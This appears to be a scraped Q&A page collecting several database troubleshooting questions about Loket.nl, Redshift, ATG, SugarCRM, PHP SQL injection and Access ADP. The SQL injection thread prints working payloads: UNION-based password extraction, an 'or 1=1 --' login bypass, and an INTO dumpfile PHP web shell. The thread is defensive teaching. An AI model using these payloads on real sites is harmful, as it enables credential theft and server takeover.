"s:Client: Not Allowed List" error when running Loket.nl query - invantive-sql

For one customer site, the following query:
select /*+ ods(false) */ *
from Werkgevers#loket wgr
join PersonenPerWerkgever(wgr.entryid)#loket psn
join WerknemerVerloningsrunsPerPersoon(wgr.entryid)#loket wvn
returns an error with message code "s:Client" and text "Not Allowed List".
I seem unable to find any documentation on this loket.nl error with Invantive SQL. How can I fix it?

This error is typically caused by missing privileges. The text is not very well formulated, but you will have to live with it since Loket is focusing on adding a new REST-based API platform.
Make sure your user has sufficient privileges.

Related

See why an Amazon Redshift scheduled query fails

I have a scheduled query in Redshift that simply will not run. It works when I execute the query manually in the query editor, just not when scheduled. I can't seem to find any feedback about why it's failing, though. I can see the schedule history, a unique Id, and the status of "Failed", but no more info.
Is there a system table/view that I can dig into and find out what's going on with my query? The SQL consists of basic select, update, insert style code - nothing fancy, just long.
You can look for any errors using:
select
process,
errcode,
linenum as line,
trim(error) as err
from
stl_error;
Also: Retrieve Redshift error messages
Ref.: STL_ERROR
It says in the description that it doesn't record SQL errors, which would likely be the problem with the failed query.
I'm trying to sort this one as well and it seems it's limited as I only see the
Any idea how to get the associated query ID, PID, or EID so I can check maybe against the query history?

Unable to search for Orders/Customers in oracle commerce (ATG) - CSC 11.1

I am trying to perform order and profile search operations on CSC, but they return no results.
I checked the components /atg/commerce/textsearch/OrderOutputConfig/ and /atg/userprofiling/textsearch/ProfileOutputConfig/ and found them indexing perfectly in the tables SRCH_ORDER_TOKENS and SRCH_PROFILE_TOKENS respectively.
After enabling loggingDebug in both components I found that the search query has an additional condition that seems to be related to multisite (pfrmZeroRealmsAccessible); however, I found that all tokens stored in the DB for orders and customers have the value pfrmdft. Below is the query extracted from the logs:
[++SQLQuery++]
SELECT t1.id
FROM srch_order_tokens t1
WHERE CONTAINS(t1.tokens,?,0) > 0
-- Parameters --
p[1] = {pd: tokens} pflnAhmad% AND pfrmZeroRealmsAccessible% (java.lang.String)
[--SQLQuery--]
Note: My application has only one single site (not multisite) however I found some configuration files created by CIM related to multisite which I can't remove.
Please help me answer the following questions:
Is this issue really related to multisite configuration and how can I fix this problem in orders and customers search?
In Oracle commerce 11.1 how can I disable working with multisite?
Thanks
If you have not configured multisite, then you need to change the property "siteAccessControlOn" to false in the component below:
/atg/commerce/custsvc/environment/CSREnvironmentTools/
For more details, see the Oracle docs link below:
http://docs.oracle.com/cd/E52191_01/Service.11-1/ATGCommerceServiceCenterInstall/html/s1203controllingsiteaccess01.html

SugarCRM API Query - getting Access Denied?

I am running SugarCRM 6.5.x and using the SOAP API. What I am trying to achieve is lookup an Account by checking the value of a custom field with the company registration number like this:
get_entry_list(...
accounts.id in (select id_c from accounts_cstm join accounts on accounts_cstm.id_c = accounts.id where accounts_cstm.company_number__c = '12345678')
... )
I keep getting access denied errors and I don't understand why. If I run the query in phpMyAdmin it works fine. How can I make this work for SugarCRM?
Support for subqueries like that in our Web Services API is removed as of Sugar 6.4, with certain exceptions; see this post for more details...
http://developer.sugarcrm.com/2012/03/19/howto-avoiding-subqueries-with-our-web-services/
For this one, you shouldn't need to do the subquery as the cstm is joined in automatically.
Are you sure that you opened a session and sent the right parameters?
get_entry_list($session, $module_name, $query, $order_by,$offset, $select_fields, $link_name_to_fields_array, $max_results, $deleted )
Take a look at the API Description and search for "Call: get_entry_list()".
It's for 6.4 but shouldn't make any difference.

Website security, sql injection and file permissions

I am building a very small website (with PHP) and I have 2 big issues.
The first one is about my search form.
I have built a really simple search form in order to retrieve my content, then I used an online security tool and it showed me that my search form was vulnerable to SQLi.
I had no idea about that so I started testing some attacks I found on some sites.
So far only 'OR 'x'='x worked (it returns the entire content of my website). Is this bad? How can an attacker hurt me?
The second issue is about my photos, I am using a folder called mywebsite.com/uploads/ to access my photos.
Although /upload is protected the subfolders uploads/temp and uploads/thumbs are visible through the browser
May this be hurtful too?
Any advice?
SQL injection is really bad, but I like it :)
There are many types of SQL injection, like:
remote SQL injection
blind SQL injection
auto bypass SQL injection
**Remote SQL injection**
It's the easy way to get data from a site; hackers use it like coders.
See this example:
mysql_query("SELECT * FROM `table_name` WHERE id=" . $_GET['id']);
There is no security in my code.
site.php?id=1
My query will execute like:
mysql_query("SELECT * FROM `table_name` WHERE id=1");
If a hacker comes, he will kill your code:
site.php?id=1 (anything here can make a problem, e.g. ` ' a-z A-Z / * / " )
because the query will be like this:
mysql_query("SELECT * FROM `table_name` WHERE id=1'");
So a single quotation mark will make an error in your query,
and the hacker can attack like this:
site.php?id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users
Here your query will execute like:
mysql_query("SELECT * FROM `table_name` WHERE id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users");
and this will work :)
**Blind SQL injection**
The hacker cannot work the easy way (remote SQL injection),
because here it depends on true and false,
so he will use AND/OR,
like this:
and (select user_name from users) ;
If it works fine the script will work well, else an error will happen.
He can know database info like this.
Example: the admin table is admin.
and (select user_name from users) ; x error
and (select user_name from admin) ; fine
**Auto bypass**
It's blind SQL injection, but only a true condition can give access to admin.
mysql_query("SELECT * FROM `users` WHERE `user_name`='" . $_POST['user'] . "' AND `password`='" . md5($_POST['pass']) . "'");
The hacker can log in like this:
user = anything' or 1=1 --
so your query will be like:
mysql_query("SELECT * FROM `users` WHERE `user_name`='anything' or 1=1 --' AND `password`='...'");
anything is an erroneous user in the database,
but the condition or 1=1 is true,
and -- will ignore your password check,
so he can access easily.
Protect:
addslashes / mysql_real_escape_string / intval (with numbers only)
For folder permissions you can use
an empty index.html or index.php.
If you allow SQL injection, an attacker can do all sorts of bad things to your website. They can inject code to DROP DATABASE, deleting your entire database!
If you are logging into your MySQL as the root user, they can potentially write to (and create) files on your server.
The injection:
SELECT '<?php system($_GET[''cmd'']); ?>' INTO dumpfile('./command.php');
Would be a common first step to breaking into your server, allowing the attacker to execute arbitrary commands under the www-data user. From here it is trivial to recruit your server into a botnet, use it to send spam (getting you blacklisted from sending emails), or simply delete all your files just to ruin your day.
What you must do is sanitise all user input. So, in your search processor, you must escape any special characters from the search query before passing it on to the database; you can do this using mysql_real_escape_string().
So:
$search_query = mysql_real_escape_string($_POST['search']);
It is then safe to use $search_query in your mysql query.
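As an added example (not code from the question or any of the answers), here are the asker's 'OR 'x'='x search and the login bypass from the first answer run in Python against a constructed SQLite database: first through string-concatenated queries like the PHP shown above, then through bound parameters, which is the prepared-statement approach rather than the mysql_real_escape_string() escaping the answers recommend. The table names, rows and passwords are assumed.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed sample data (assumed, not from the post): two users and two articles."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, user_name TEXT, password TEXT)")
    db.execute("CREATE TABLE articles (id INTEGER, title TEXT, published INTEGER)")
    # md5 only because the answer above uses md5(); it is not a recommendation.
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", hashlib.md5(b"s3cret").hexdigest()),
                    (2, "alice", hashlib.md5(b"wonderland").hexdigest())])
    db.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                   [(1, "Public post", 1), (2, "Unpublished draft", 0)])
    return db


def login_concat(db, user, pw):
    """The answer's PHP pattern: user input is spliced into the SQL text."""
    pw_hash = hashlib.md5(pw.encode()).hexdigest()
    sql = ("SELECT user_name FROM users WHERE user_name = '" + user
           + "' AND password = '" + pw_hash + "'")
    return [row[0] for row in db.execute(sql)]


def login_param(db, user, pw):
    """Same query with bound parameters: the input stays data, never SQL."""
    pw_hash = hashlib.md5(pw.encode()).hexdigest()
    rows = db.execute("SELECT user_name FROM users WHERE user_name = ? AND password = ?",
                      (user, pw_hash))
    return [row[0] for row in rows]


def search_concat(db, term):
    """The asker's search form: only published articles should match the term."""
    sql = "SELECT title FROM articles WHERE published = 1 AND title = '" + term + "'"
    return [row[0] for row in db.execute(sql)]


def search_param(db, term):
    """Same search with a bound parameter."""
    rows = db.execute("SELECT title FROM articles WHERE published = 1 AND title = ?", (term,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "anything' or 1=1 --", "wrong"))  # every user: bypass succeeds
    print(login_param(db, "anything' or 1=1 --", "wrong"))   # []: bypass fails
    print(search_concat(db, "' OR 'x'='x"))                   # leaks the unpublished draft
    print(search_param(db, "' OR 'x'='x"))                    # []
```

The concatenated search also leaks the unpublished row, which is the "hidden content" risk the last answer describes.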
SQL injection - it's bad.
Someone can run any query he wants in your database, find passwords, delete your entire data, etc.
You can avoid it by wrapping all user input in your queries with mysql_real_escape_string.
About the directories - it really depends on the access you provide. If file listing is available, it doesn't really mean that someone can make changes to or execute them.
Ad SQL Injection:
Displaying the entire content can be a problem if you have unpublished articles or articles only available for registered users etc.
Try reading more on SQL Injections. It may be possible to execute a second query that inserts new data in your database - or worse changes data (for example passwords). There's a lot of reading material out there, a start could be: http://php.net/manual/en/security.database.sql-injection.php Sanitise all your input and remember: even if you may not find a way to do harm via a security hole it doesn't mean no one will find a way ;)
Ad the folders: you mean that any user can see the content of the folders? If so, users may see pictures they shouldn't see. If you had a good reason for protecting (no file listing?) the main directory, why not apply it to the temps/ and thumbs/ subdirectories?

Microsoft Access ADP UPDATE Query does NOT update

I have a (very simple and standard) UPDATE statement which works fine either directly in Query Analyser, or executed as a stored procedure in Query Analyser.
UPDATE A
SET
A.field1 = B.col1
, A.field2 = B.col2
FROM
tblA AS A INNER JOIN tblB AS B
ON A.pk1 = B.pk1 AND A.pk2 = B.pk2
The problem is when I execute the same stored proc via Microsoft ADP (by double-clicking on the sproc name or using the Run option): it says "query ran successfully but did not return records" AND does NOT update the records when I inspect the tables directly.
Before anyone even says "the syntax of MS Access is different from SQL Server T-SQL", remember that with ADP everything happens on the server and one is actually passing through to T-SQL.
Any bright ideas from any ADP gurus out there?
Gotcha. Responding to my own question for the benefit of anyone else.
Tools / Options / Advanced / Client-Server Settings / Default max records is set at 10,000 (presumably this is the default). Change this to 0 for unlimited.
My table had 100,000+ rows and whatever set of 10,000 it was updating was difficult to find ( among a sea of 90,000+ un-updated rows ). Hence the update did not work fully as expected.
Try and see whether the query gets executed on the SQL Server using SQL profiler.
Also, I think you might need to close the linked table & re-open it to see the updated records.
Does that work?
Run the query with SQL Profiler running. Before you start the trace, add in all the error events. This will give you any errors that the SQL Server is generating that the Access ADP might not be showing correctly (or at all).
Feel free to post them here.
Just as a reference, here's a paper I wrote on Update Queries that discusses some of the issues associated with when they fail.
http://www.fmsinc.com/microsoftaccess/query/snytax/update-query.html
I seem to remember that I always got the "didn't return any rows" message and had to simply turn off the messaging. It's because it isn't returning any rows!
As for the other - sometimes there's a primary key issue. Does the table being updated have a primary key in SQL Server? If so, check the view of the table in Access - sometimes that link doesn't come through. It's been a while, so I could be wrong, but I think you may need to look at the design view of the table while in Access and add the primary key there.
EDIT: Additional thought:
In your debugging, try throwing in print statements to see what the values of your inputs are. Is it actually picking up the data from the table as you expect when you execute from Access?